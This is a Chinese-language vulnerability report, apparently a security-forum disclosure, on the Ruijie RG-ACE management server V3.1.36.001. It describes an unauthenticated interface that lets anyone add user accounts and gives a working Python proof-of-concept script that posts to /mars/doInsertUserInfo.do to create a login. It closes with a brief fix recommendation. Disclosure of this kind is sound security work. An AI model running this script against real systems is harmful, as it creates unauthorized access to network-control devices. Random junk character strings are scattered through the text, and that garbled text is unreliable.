锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
6 }' Q9 t7 C; b4 q5 A

测试的具体版本是
) u* ~9 h' ]1 p. P" |, i( z产品名称: 锐捷应用控制引擎
6 _! J. n8 ~% a+ [8 Y- x7 w% r& f版本号: 3.1.36.001 TC
0 R: a6 T; ^  |' L: D& j0 O3 V编译时间: 201104291730


# L9 j/ E2 G/ y% u) o5 s漏洞证明：

3 H9 r: F0 u* w/ \5 f
2 b8 D4 |' d, |( l; j

# S  ]8 w. z$ d5 X$ a

执行脚本
#! /usr/bin/env python
1 ?, h5 F$ L1 \7 n3 \' C#coding=gbk
- `0 N) S2 J5 Z% p+ C; J! ^, ?% y#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
8 o) D' Z# ^( C' G$ o" g& p' nurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
( Q( J# O# R; y# g" dopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
4 X' l/ R' h" a7 J("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
9 u* x3 X5 \9 {5 B1 ~("officePhone",""),
("addr",""),
8 D1 y* l5 T5 w0 {: ^5 m("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
! X# q1 J6 f0 ^6 W- R( m: S% cprint "Done"
& B7 Q& I9 G9 |% f. Z0 W
登录，连接设备

4 a, w. O$ _2 j' Y
4 g: J; m, [& `


默认的管理员admin权限更大点

$ f: f- d4 ^5 W# |: c' a. F$ S
8 F, y1 U! b% {' a7 \
: v; O4 X( y1 x) K

修复方案：
+ W  v7 ~$ X; @, w$ E0 [* ~# W加强对接口的权限验证
; e3 _; J- C7 |" Y# s9 f
( l5 J% W; Z( _8 }2 R! U$ |% Q' m: M